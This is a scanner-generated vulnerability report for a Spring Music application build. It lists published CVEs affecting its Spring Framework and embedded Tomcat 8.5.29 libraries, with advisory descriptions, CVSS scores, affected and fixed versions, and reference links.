Vulnerable Software & Versions:
CVE-2018-1257
Spring Framework, versions 5.0.x prior to 5.0.6, versions 4.3.x prior to 4.3.17, and older unsupported versions allows applications to expose STOMP over WebSocket endpoints with a simple, in-memory STOMP broker through the spring-messaging module. A malicious user (or attacker) can craft a message to the broker that can lead to a regular expression, denial of service attack. NVD-CWE-noinfo
CVSSv3:
Base Score: MEDIUM (6.5)
Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H/E:2.8/RC:R/MAV:A
CVSSv2:
Base Score: MEDIUM (4.0)
Vector: /AV:N/AC:L/Au:S/C:N/I:N/A:P
References:
* OSSINDEX - [CVE-2018-1257] CWE-noinfo
* OSSIndex - http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-1257
* OSSIndex - https://jira.spring.io/browse/SPR-16731
* OSSIndex - https://pivotal.io/security/cve-2018-1257
Vulnerable Software & Versions:
CVE-2020-5421
In Spring Framework versions 5.2.0 - 5.2.8, 5.1.0 - 5.1.17, 5.0.0 - 5.0.18, 4.3.0 - 4.3.28, and older unsupported versions, the protections against RFD attacks from CVE-2015-5211 may be bypassed depending on the browser used through the use of a jsessionid path parameter. NVD-CWE-noinfo
CVSSv3:
Base Score: MEDIUM (6.5)
Vector: CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:L/I:H/A:N/E:1.3/RC:R/MAV:A
CVSSv2:
Base Score: LOW (3.6)
Vector: /AV:N/AC:H/Au:S/C:P/I:P/A:N
References:
* OSSINDEX - [CVE-2020-5421] CWE-noinfo
* OSSIndex - http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-5421
* OSSIndex - https://tanzu.vmware.com/security/cve-2020-5421
Vulnerable Software & Versions:
CVE-2022-22950
In Spring Framework versions 5.3.0 - 5.3.16 and older unsupported versions, it is possible for a user to provide a specially crafted SpEL expression that may cause a denial of service condition. CWE-770 Allocation of Resources Without Limits or Throttling
CVSSv3:
Base Score: MEDIUM (6.5)
Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H/E:2.8/RC:R/MAV:A
CVSSv2:
Base Score: MEDIUM (4.0)
Vector: /AV:N/AC:L/Au:S/C:N/I:N/A:P
References:
Vulnerable Software & Versions:
CVE-2023-20861
In Spring Framework versions 6.0.0 - 6.0.6, 5.3.0 - 5.3.25, 5.2.0.RELEASE - 5.2.22.RELEASE, and older unsupported versions, it is possible for a user to provide a specially crafted SpEL expression that may cause a denial-of-service (DoS) condition. CWE-400 Uncontrolled Resource Consumption, NVD-CWE-noinfo
CVSSv3:
Base Score: MEDIUM (6.5) Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H/E:2.8/RC:R/MAV:A
CVE-2018-11039
Spring Framework (versions 5.0.x prior to 5.0.7, versions 4.3.x prior to 4.3.18, and older unsupported versions) allows web applications to change the HTTP request method to any HTTP method (including TRACE) using the HiddenHttpMethodFilter in Spring MVC. If an application has a pre-existing XSS vulnerability, a malicious user (or attacker) can use this filter to escalate to an XST (Cross Site Tracing) attack. NVD-CWE-noinfo
CVSSv3:
Base Score: MEDIUM (5.9) Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N/E:2.2/RC:R/MAV:A
CVSSv2:
Base Score: MEDIUM (4.3) Vector: /AV:N/AC:M/Au:N/C:P/I:N/A:N
References:
OSSINDEX - [CVE-2018-11039] CWE-noinfo
OSSIndex - http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-11039
OSSIndex - https://jira.spring.io/browse/SPR-16836
OSSIndex - https://pivotal.io/security/cve-2018-11039
CVE-2020-5397 (OSSINDEX)
Spring Framework, versions 5.2.x prior to 5.2.3 are vulnerable to CSRF attacks through CORS preflight requests that target Spring MVC (spring-webmvc module) or Spring WebFlux (spring-webflux module) endpoints. Only non-authenticated endpoints are vulnerable because preflight requests should not include credentials and therefore requests should fail authentication. However a notable exception to this are Chrome based browsers when using client certificates for authentication since Chrome sends TLS client certificates in CORS preflight requests in violation of spec requirements. No HTTP body can be sent or received as a result of this attack.
Sonatype's research suggests that this CVE's details differ from those defined at NVD. See https://ossindex.sonatype.org/vulnerability/CVE-2020-5397 for details CWE-352 Cross-Site Request Forgery (CSRF)
CVSSv3:
Base Score: MEDIUM (5.3) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
Vulnerable Software & Versions (OSSINDEX):
cpe:2.3:a:org.springframework:spring-webmvc:5.0.5.RELEASE:*:*:*:*:*:*:*
CVE-2022-22968
In Spring Framework versions 5.3.0 - 5.3.18, 5.2.0 - 5.2.20, and older unsupported versions, the patterns for disallowedFields on a DataBinder are case sensitive which means a field is not effectively protected unless it is listed with both upper and lower case for the first character of the field, including upper and lower case for the first character of all nested fields within the property path. CWE-178 Improper Handling of Case Sensitivity
CVSSv3:
Base Score: MEDIUM (5.3) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N/E:3.9/RC:R/MAV:A
CVSSv2:
Base Score: MEDIUM (5.0) Vector: /AV:N/AC:L/Au:N/C:N/I:P/A:N
CVE-2022-22970
In Spring Framework versions prior to 5.3.20+, 5.2.22+ and older unsupported versions, applications that handle file uploads are vulnerable to a DoS attack if they rely on data binding to set a MultipartFile or javax.servlet.Part to a field in a model object. CWE-770 Allocation of Resources Without Limits or Throttling
CVSSv3:
Base Score: MEDIUM (5.3) Vector: CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H/E:1.6/RC:R/MAV:A
CVSSv2:
Base Score: LOW (3.5) Vector: /AV:N/AC:M/Au:S/C:N/I:N/A:P
CVE-2021-22060 (OSSINDEX)
In Spring Framework versions 5.3.0 - 5.3.13, 5.2.0 - 5.2.18, and older unsupported versions, it is possible for a user to provide malicious input to cause the insertion of additional log entries. This is a follow-up to CVE-2021-22096 that protects against additional types of input and in more places of the Spring Framework codebase. CWE-noinfo
CVSSv3:
Base Score: MEDIUM (4.3) Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N
Vulnerable Software & Versions (OSSINDEX):
cpe:2.3:a:org.springframework:spring-webmvc:5.0.5.RELEASE:*:*:*:*:*:*:*
spring-music-sqldb-1.0.jar: tomcat-embed-core-8.5.29.jar
Description: Core Tomcat implementation
License: Apache License, Version 2.0: http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/tomcat-embed-core-8.5.29.jar
MD5: 73033b27fd1ce1875d83da62a9fdd7cc
SHA1: 51eac5adde4bc019261b787cb99e5548206908e6
SHA256: 5e821019abc6b19890753c8f6b076893434b264716b7ead980a598fcdfbaafb2
Evidence
Type     Source    Name                    Value                       Confidence
Vendor   central   artifactid              tomcat-embed-core           Highest
Vendor   central   groupid                 org.apache.tomcat.embed     Highest
Vendor   file      name                    tomcat-embed-core           High
Vendor   jar       package name            apache                      Highest
Vendor   jar       package name            apache                      Low
Vendor   Manifest  Implementation-Vendor   Apache Software Foundation  High
Vendor   Manifest  specification-vendor    Apache Software Foundation  Low
Vendor   pom       artifactid              tomcat-embed-core           Low
Vendor   pom       groupid                 org.apache.tomcat.embed     Highest
Vendor   pom       url                     http://tomcat.apache.org/   Highest
Product  central   artifactid              tomcat-embed-core           Highest
Product  file      name                    tomcat-embed-core           High
Product  jar       package name            apache                      Highest
Product  jar       package name            tomcat                      Highest
Product  Manifest  Implementation-Title    Apache Tomcat               High
Product  Manifest  specification-title     Apache Tomcat               Medium
Product  pom       artifactid              tomcat-embed-core           Highest
Product  pom       groupid                 org.apache.tomcat.embed     Highest
Product  pom       url                     http://tomcat.apache.org/   Medium
Version  central   version                 8.5.29                      Highest
Version  file      version                 8.5.29                      High
Version  Manifest  Implementation-Version  8.5.29                      High
Version  pom       version                 8.5.29                      Highest
CVE-2018-8014
The defaults settings for the CORS filter provided in Apache Tomcat 9.0.0.M1 to 9.0.8, 8.5.0 to 8.5.31, 8.0.0.RC1 to 8.0.52, 7.0.41 to 7.0.88 are insecure and enable 'supportsCredentials' for all origins. It is expected that users of the CORS filter will have configured it appropriately for their environment rather than using it in the default configuration. Therefore, it is expected that most users will not be impacted by this issue. CWE-1188 Insecure Default Initialization of Resource
CVSSv3:
Base Score: CRITICAL (9.8) Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:3.9/RC:R/MAV:A
CVSSv2:
Base Score: HIGH (7.5) Vector: /AV:N/AC:L/Au:N/C:P/I:P/A:P
CVE-2020-1938
CISA Known Exploited Vulnerability:
Product: Apache Tomcat
Name: Apache Tomcat Improper Privilege Management Vulnerability
Date Added: 2022-03-03
Description: Apache Tomcat treats Apache JServ Protocol (AJP) connections as having higher trust than, for example, a similar HTTP connection. If such connections are available to an attacker, they can be exploited.
Required Action: Apply updates per vendor instructions.
Due Date: 2022-03-17
Notes: https://nvd.nist.gov/vuln/detail/CVE-2020-1938
When using the Apache JServ Protocol (AJP), care must be taken when trusting incoming connections to Apache Tomcat. Tomcat treats AJP connections as having higher trust than, for example, a similar HTTP connection. If such connections are available to an attacker, they can be exploited in ways that may be surprising. In Apache Tomcat 9.0.0.M1 to 9.0.0.30, 8.5.0 to 8.5.50 and 7.0.0 to 7.0.99, Tomcat shipped with an AJP Connector enabled by default that listened on all configured IP addresses. It was expected (and recommended in the security guide) that this Connector would be disabled if not required. This vulnerability report identified a mechanism that allowed:
- returning arbitrary files from anywhere in the web application
- processing any file in the web application as a JSP
Further, if the web application allowed file upload and stored those files within the web application (or the attacker was able to control the content of the web application by some other means) then this, along with the ability to process a file as a JSP, made remote code execution possible. It is important to note that mitigation is only required if an AJP port is accessible to untrusted users. Users wishing to take a defence-in-depth approach and block the vector that permits returning arbitrary files and execution as JSP may upgrade to Apache Tomcat 9.0.31, 8.5.51 or 7.0.100 or later. A number of changes were made to the default AJP Connector configuration in 9.0.31 to harden the default configuration. It is likely that users upgrading to 9.0.31, 8.5.51 or 7.0.100 or later will need to make small changes to their configurations. NVD-CWE-Other
CVSSv3:
Base Score: CRITICAL (9.8) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:3.9/RC:R/MAV:A
CVSSv2:
Base Score: HIGH (7.5) Vector: /AV:N/AC:L/Au:N/C:P/I:P/A:P
CVE-2025-48988 (OSSINDEX)
Allocation of Resources Without Limits or Throttling vulnerability in Apache Tomcat.
This issue affects Apache Tomcat: from 11.0.0-M1 through 11.0.7, from 10.1.0-M1 through 10.1.41, from 9.0.0.M1 through 9.0.105.
Users are recommended to upgrade to version 11.0.8, 10.1.42 or 9.0.106, which fix the issue.
Sonatype's research suggests that this CVE's details differ from those defined at NVD. See https://ossindex.sonatype.org/vulnerability/CVE-2025-48988 for details CWE-770 Allocation of Resources Without Limits or Throttling
CVSSv4:
Base Score: HIGH (8.7) Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N
Vulnerable Software & Versions (OSSINDEX):
cpe:2.3:a:org.apache.tomcat.embed:tomcat-embed-core:8.5.29:*:*:*:*:*:*:*
CVE-2022-25762
If a web application sends a WebSocket message concurrently with the WebSocket connection closing when running on Apache Tomcat 8.5.0 to 8.5.75 or Apache Tomcat 9.0.0.M1 to 9.0.20, it is possible that the application will continue to use the socket after it has been closed. The error handling triggered in this case could cause a pooled object to be placed in the pool twice. This could result in subsequent connections using the same object concurrently, which could result in data being returned to the wrong user and/or other errors. CWE-404 Improper Resource Shutdown or Release
CVSSv3:
Base Score: HIGH (8.6) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:L/E:3.9/RC:R/MAV:A
CVSSv2:
Base Score: HIGH (7.5) Vector: /AV:N/AC:L/Au:N/C:P/I:P/A:P
CVE-2019-0232
When running on Windows with enableCmdLineArguments enabled, the CGI Servlet in Apache Tomcat 9.0.0.M1 to 9.0.17, 8.5.0 to 8.5.39 and 7.0.0 to 7.0.93 is vulnerable to Remote Code Execution due to a bug in the way the JRE passes command line arguments to Windows. The CGI Servlet is disabled by default. The CGI option enableCmdLineArguments is disabled by default in Tomcat 9.0.x (and will be disabled by default in all versions in response to this vulnerability). For a detailed explanation of the JRE behaviour, see Markus Wulftange's blog (https://codewhitesec.blogspot.com/2016/02/java-and-command-line-injections-in-windows.html) and this archived MSDN blog (https://web.archive.org/web/20161228144344/https://blogs.msdn.microsoft.com/twistylittlepassagesallalike/2011/04/23/everyone-quotes-command-line-arguments-the-wrong-way/). CWE-78 Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
CVSSv3:
Base Score: HIGH (8.1) Vector: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:2.2/RC:R/MAV:A
CVSSv2:
Base Score: HIGH (9.3) Vector: /AV:N/AC:M/Au:N/C:C/I:C/A:C
CVE-2018-1336
An improper handling of overflow in the UTF-8 decoder with supplementary characters can lead to an infinite loop in the decoder causing a Denial of Service. Versions Affected: Apache Tomcat 9.0.0.M9 to 9.0.7, 8.5.0 to 8.5.30, 8.0.0.RC1 to 8.0.51, and 7.0.28 to 7.0.86. CWE-835 Loop with Unreachable Exit Condition ('Infinite Loop')
CVSSv3:
Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:3.9/RC:R/MAV:A
CVSSv2:
Base Score: MEDIUM (5.0) Vector: /AV:N/AC:L/Au:N/C:N/I:N/A:P
CVE-2018-8034
The host name verification when using TLS with the WebSocket client was missing. It is now enabled by default. Versions Affected: Apache Tomcat 9.0.0.M1 to 9.0.9, 8.5.0 to 8.5.31, 8.0.0.RC1 to 8.0.52, and 7.0.35 to 7.0.88. CWE-295 Improper Certificate Validation
CVSSv3:
Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N/E:3.9/RC:R/MAV:A
CVSSv2:
Base Score: MEDIUM (5.0) Vector: /AV:N/AC:L/Au:N/C:P/I:N/A:N
CVE-2019-0199
The HTTP/2 implementation in Apache Tomcat 9.0.0.M1 to 9.0.14 and 8.5.0 to 8.5.37 accepted streams with excessive numbers of SETTINGS frames and also permitted clients to keep streams open without reading/writing request/response data. By keeping streams open for requests that utilised the Servlet API's blocking I/O, clients were able to cause server-side threads to block eventually leading to thread exhaustion and a DoS. CWE-400 Uncontrolled Resource Consumption
CVSSv3:
Base Score: HIGH (7.5) Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:3.9/RC:R/MAV:A
CVSSv2:
Base Score: MEDIUM (5.0) Vector: /AV:N/AC:L/Au:N/C:N/I:N/A:P
CVE-2019-10072
The fix for CVE-2019-0199 was incomplete and did not address HTTP/2 connection window exhaustion on write in Apache Tomcat versions 9.0.0.M1 to 9.0.19 and 8.5.0 to 8.5.40. By not sending WINDOW_UPDATE messages for the connection window (stream 0), clients were able to cause server-side threads to block, eventually leading to thread exhaustion and a DoS. CWE-667 Improper Locking
CVSSv3:
Base Score: HIGH (7.5) Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:3.9/RC:R/MAV:A
CVSSv2:
Base Score: MEDIUM (5.0) Vector: /AV:N/AC:L/Au:N/C:N/I:N/A:P
CVE-2019-17563
When using FORM authentication with Apache Tomcat 9.0.0.M1 to 9.0.29, 8.5.0 to 8.5.49 and 7.0.0 to 7.0.98 there was a narrow window where an attacker could perform a session fixation attack. The window was considered too narrow for an exploit to be practical but, erring on the side of caution, this issue has been treated as a security vulnerability. CWE-384 Session Fixation
CVSSv3:
Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H/E:1.6/RC:R/MAV:A
CVSSv2:
Base Score: MEDIUM (5.1) Vector: /AV:N/AC:H/Au:N/C:P/I:P/A:P
CVE-2020-11996
A specially crafted sequence of HTTP/2 requests sent to Apache Tomcat 10.0.0-M1 to 10.0.0-M5, 9.0.0.M1 to 9.0.35 and 8.5.0 to 8.5.55 could trigger high CPU usage for several seconds. If a sufficient number of such requests were made on concurrent HTTP/2 connections, the server could become unresponsive. NVD-CWE-noinfo
CVSSv3:
Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:3.9/RC:R/MAV:A
CVSSv2:
Base Score: MEDIUM (5.0) Vector: /AV:N/AC:L/Au:N/C:N/I:N/A:P
CVE-2020-13934
An h2c direct connection to Apache Tomcat 10.0.0-M1 to 10.0.0-M6, 9.0.0.M5 to 9.0.36 and 8.5.1 to 8.5.56 did not release the HTTP/1.1 processor after the upgrade to HTTP/2. If a sufficient number of such requests were made, an OutOfMemoryException could occur leading to a denial of service. CWE-401 Missing Release of Memory after Effective Lifetime, CWE-476 NULL Pointer Dereference
CVSSv3:
Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:3.9/RC:R/MAV:A
CVSSv2:
Base Score: MEDIUM (5.0) Vector: /AV:N/AC:L/Au:N/C:N/I:N/A:P
CVE-2020-13935
The payload length in a WebSocket frame was not correctly validated in Apache Tomcat 10.0.0-M1 to 10.0.0-M6, 9.0.0.M1 to 9.0.36, 8.5.0 to 8.5.56 and 7.0.27 to 7.0.104. Invalid payload lengths could trigger an infinite loop. Multiple requests with invalid payload lengths could lead to a denial of service. CWE-835 Loop with Unreachable Exit Condition ('Infinite Loop')
CVSSv3:
Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:3.9/RC:R/MAV:A
CVSSv2:
Base Score: MEDIUM (5.0) Vector: /AV:N/AC:L/Au:N/C:N/I:N/A:P
CVE-2020-17527
While investigating bug 64830 it was discovered that Apache Tomcat 10.0.0-M1 to 10.0.0-M9, 9.0.0-M1 to 9.0.39 and 8.5.0 to 8.5.59 could re-use an HTTP request header value from the previous stream received on an HTTP/2 connection for the request associated with the subsequent stream. While this would most likely lead to an error and the closure of the HTTP/2 connection, it is possible that information could leak between requests. CWE-200 Exposure of Sensitive Information to an Unauthorized Actor
CVSSv3:
Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N/E:3.9/RC:R/MAV:A
CVSSv2:
Base Score: MEDIUM (5.0) Vector: /AV:N/AC:L/Au:N/C:P/I:N/A:N
CVE-2021-25122
When responding to new h2c connection requests, Apache Tomcat versions 10.0.0-M1 to 10.0.0, 9.0.0.M1 to 9.0.41 and 8.5.0 to 8.5.61 could duplicate request headers and a limited amount of request body from one request to another meaning user A and user B could both see the results of user A's request.
CWE-200 Exposure of Sensitive Information to an Unauthorized Actor
CVSSv3:
Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N/E:3.9/RC:R/MAV:A
CVSSv2:
Base Score: MEDIUM (5.0) Vector: /AV:N/AC:L/Au:N/C:P/I:N/A:N
References:
Vulnerable Software & Versions:
CVE-2021-41079
Apache Tomcat 8.5.0 to 8.5.63, 9.0.0-M1 to 9.0.43 and 10.0.0-M1 to 10.0.2 did not properly validate incoming TLS packets. When Tomcat was configured to use NIO+OpenSSL or NIO2+OpenSSL for TLS, a specially crafted packet could be used to trigger an infinite loop resulting in a denial of service.
CWE-20 Improper Input Validation, CWE-835 Loop with Unreachable Exit Condition ('Infinite Loop')
CVSSv3:
Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:3.9/RC:R/MAV:A
CVSSv2:
Base Score: MEDIUM (4.3) Vector: /AV:N/AC:M/Au:N/C:N/I:N/A:P
References:
Vulnerable Software & Versions:
CVE-2022-42252
If Apache Tomcat 8.5.0 to 8.5.82, 9.0.0-M1 to 9.0.67, 10.0.0-M1 to 10.0.26 or 10.1.0-M1 to 10.1.0 was configured to ignore invalid HTTP headers via setting rejectIllegalHeader to false (the default for 8.5.x only), Tomcat did not reject a request containing an invalid Content-Length header making a request smuggling attack possible if Tomcat was located behind a reverse proxy that also failed to reject the request with the invalid header.
CWE-444 Inconsistent Interpretation of HTTP Requests ('HTTP Request/Response Smuggling')
CVSSv3:
Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N/E:3.9/RC:R/MAV:A
References:
Vulnerable Software & Versions:
CVE-2023-44487
CISA Known Exploited Vulnerability:
Product: IETF HTTP/2
Name: HTTP/2 Rapid Reset Attack Vulnerability
Date Added: 2023-10-10
Description: HTTP/2 contains a rapid reset vulnerability that allows for a distributed denial-of-service attack (DDoS).
Required Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
Due Date: 2023-10-31
Notes: This vulnerability affects a common open-source component, third-party library, or protocol used by different products. For more information, please see: HTTP/2 Rapid Reset Vulnerability, CVE-2023-44487 | CISA: https://www.cisa.gov/news-events/alerts/2023/10/10/http2-rapid-reset-vulnerability-cve-2023-44487; https://blog.cloudflare.com/technical-breakdown-http2-rapid-reset-ddos-attack/; https://nvd.nist.gov/vuln/detail/CVE-2023-44487
The HTTP/2 protocol allows a denial of service (server resource consumption) because request cancellation can reset many streams quickly, as exploited in the wild in August through October 2023.
CWE-400 Uncontrolled Resource Consumption, NVD-CWE-noinfo
CVSSv3:
Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:3.9/RC:R/MAV:A
References:
Vulnerable Software & Versions:
CVE-2023-46589
Improper Input Validation vulnerability in Apache Tomcat. Tomcat from 11.0.0-M1 through 11.0.0-M10, from 10.1.0-M1 through 10.1.15, from 9.0.0-M1 through 9.0.82 and from 8.5.0 through 8.5.95 did not correctly parse HTTP trailer headers. A trailer header that exceeded the header size limit could cause Tomcat to treat a single request as multiple requests leading to the possibility of request smuggling when behind a reverse proxy.
Users are recommended to upgrade to version 11.0.0-M11 onwards, 10.1.16 onwards, 9.0.83 onwards or 8.5.96 onwards, which fix the issue.
CWE-444 Inconsistent Interpretation of HTTP Requests ('HTTP Request/Response Smuggling')
CVSSv3:
Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N/E:3.9/RC:R/MAV:A
References:
Vulnerable Software & Versions:
CVE-2024-24549
Denial of Service due to improper input validation vulnerability for HTTP/2 requests in Apache Tomcat. When processing an HTTP/2 request, if the request exceeded any of the configured limits for headers, the associated HTTP/2 stream was not reset until after all of the headers had been processed. This issue affects Apache Tomcat: from 11.0.0-M1 through 11.0.0-M16, from 10.1.0-M1 through 10.1.18, from 9.0.0-M1 through 9.0.85, from 8.5.0 through 8.5.98.
Users are recommended to upgrade to version 11.0.0-M17, 10.1.19, 9.0.86 or 8.5.99 which fix the issue.
CWE-20 Improper Input Validation, NVD-CWE-noinfo
CVSSv3:
Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:3.9/RC:R/MAV:A
References:
Vulnerable Software & Versions:
CVE-2019-12418
When Apache Tomcat 9.0.0.M1 to 9.0.28, 8.5.0 to 8.5.47, 7.0.0 and 7.0.97 is configured with the JMX Remote Lifecycle Listener, a local attacker without access to the Tomcat process or configuration files is able to manipulate the RMI registry to perform a man-in-the-middle attack to capture user names and passwords used to access the JMX interface. The attacker can then use these credentials to access the JMX interface and gain complete control over the Tomcat instance.
NVD-CWE-noinfo
CVSSv3:
Base Score: HIGH (7.0) Vector: CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H/E:1.0/RC:R/MAV:A
CVSSv2:
Base Score: MEDIUM (4.4) Vector: /AV:L/AC:M/Au:N/C:P/I:P/A:P
References:
Vulnerable Software & Versions:
CVE-2020-9484
When using Apache Tomcat versions 10.0.0-M1 to 10.0.0-M4, 9.0.0.M1 to 9.0.34, 8.5.0 to 8.5.54 and 7.0.0 to 7.0.103 if a) an attacker is able to control the contents and name of a file on the server; and b) the server is configured to use the PersistenceManager with a FileStore; and c) the PersistenceManager is configured with sessionAttributeValueClassNameFilter="null" (the default unless a SecurityManager is used) or a sufficiently lax filter to allow the attacker provided object to be deserialized; and d) the attacker knows the relative file path from the storage location used by FileStore to the file the attacker has control over; then, using a specifically crafted request, the attacker will be able to trigger remote code execution via deserialization of the file under their control. Note that all of conditions a) to d) must be true for the attack to succeed.
CWE-502 Deserialization of Untrusted Data
CVSSv3:
Base Score: HIGH (7.0) Vector: CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H/E:1.0/RC:R/MAV:A
CVSSv2:
Base Score: MEDIUM (4.4) Vector: /AV:L/AC:M/Au:N/C:P/I:P/A:P
References:
Vulnerable Software & Versions:
CVE-2021-25329
The fix for CVE-2020-9484 was incomplete. When using Apache Tomcat 10.0.0-M1 to 10.0.0, 9.0.0.M1 to 9.0.41, 8.5.0 to 8.5.61 or 7.0.0 to 7.0.107 with a configuration edge case that was highly unlikely to be used, the Tomcat instance was still vulnerable to CVE-2020-9494. Note that both the previously published prerequisites for CVE-2020-9484 and the previously published mitigations for CVE-2020-9484 also apply to this issue.
NVD-CWE-noinfo
CVSSv3:
Base Score: HIGH (7.0) Vector: CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H/E:1.0/RC:R/MAV:A
CVSSv2:
Base Score: MEDIUM (4.4) Vector: /AV:L/AC:M/Au:N/C:P/I:P/A:P
References:
Vulnerable Software & Versions:
CVE-2021-30640
A vulnerability in the JNDI Realm of Apache Tomcat allows an attacker to authenticate using variations of a valid user name and/or to bypass some of the protection provided by the LockOut Realm. This issue affects Apache Tomcat 10.0.0-M1 to 10.0.5; 9.0.0.M1 to 9.0.45; 8.5.0 to 8.5.65.
CWE-116 Improper Encoding or Escaping of Output
CVSSv3:
Base Score: MEDIUM (6.5) Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:H/A:N/E:2.2/RC:R/MAV:A
CVSSv2:
Base Score: MEDIUM (5.8) Vector: /AV:N/AC:M/Au:N/C:P/I:P/A:N
References:
Vulnerable Software & Versions:
CVE-2024-23672
Denial of Service via incomplete cleanup vulnerability in Apache Tomcat. It was possible for WebSocket clients to keep WebSocket connections open leading to increased resource consumption. This issue affects Apache Tomcat: from 11.0.0-M1 through 11.0.0-M16, from 10.1.0-M1 through 10.1.18, from 9.0.0-M1 through 9.0.85, from 8.5.0 through 8.5.98.
Users are recommended to upgrade to version 11.0.0-M17, 10.1.19, 9.0.86 or 8.5.99 which fix the issue.
CWE-459 Incomplete Cleanup
CVSSv3:
Base Score: MEDIUM (6.3) Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L/E:2.8/RC:R/MAV:A
References:
Vulnerable Software & Versions:
CVE-2019-0221
The SSI printenv command in Apache Tomcat 9.0.0.M1 to 9.0.0.17, 8.5.0 to 8.5.39 and 7.0.0 to 7.0.93 echoes user provided data without escaping and is, therefore, vulnerable to XSS. SSI is disabled by default. The printenv command is intended for debugging and is unlikely to be present in a production website.
CWE-79 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
CVSSv3:
Base Score: MEDIUM (6.1) Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N/E:2.8/RC:R/MAV:A
CVSSv2:
Base Score: MEDIUM (4.3) Vector: /AV:N/AC:M/Au:N/C:N/I:P/A:N
References:
Vulnerable Software & Versions:
CVE-2023-41080
URL Redirection to Untrusted Site ('Open Redirect') vulnerability in the FORM authentication feature of Apache Tomcat. This issue affects Apache Tomcat: from 11.0.0-M1 through 11.0.0-M10, from 10.1.0-M1 through 10.0.12, from 9.0.0-M1 through 9.0.79 and from 8.5.0 through 8.5.92.
The vulnerability is limited to the ROOT (default) web application.
CWE-601 URL Redirection to Untrusted Site ('Open Redirect')
CVSSv3:
Base Score: MEDIUM (6.1) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N/E:2.8/RC:R/MAV:A
References:
Vulnerable Software & Versions:
CVE-2018-8037
If an async request was completed by the application at the same time as the container triggered the async timeout, a race condition existed that could result in a user seeing a response intended for a different user. An additional issue was present in the NIO and NIO2 connectors that did not correctly track the closure of the connection when an async request was completed by the application and timed out by the container at the same time. This could also result in a user seeing a response intended for another user. Versions Affected: Apache Tomcat 9.0.0.M9 to 9.0.9 and 8.5.5 to 8.5.31.
CWE-362 Concurrent Execution using Shared Resource with Improper Synchronization ('Race Condition')
CVSSv3:
Base Score: MEDIUM (5.9) Vector: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N/E:2.2/RC:R/MAV:A
CVSSv2:
Base Score: MEDIUM (4.3) Vector: /AV:N/AC:M/Au:N/C:P/I:N/A:N
References:
Vulnerable Software & Versions:
CVE-2019-2684 suppress
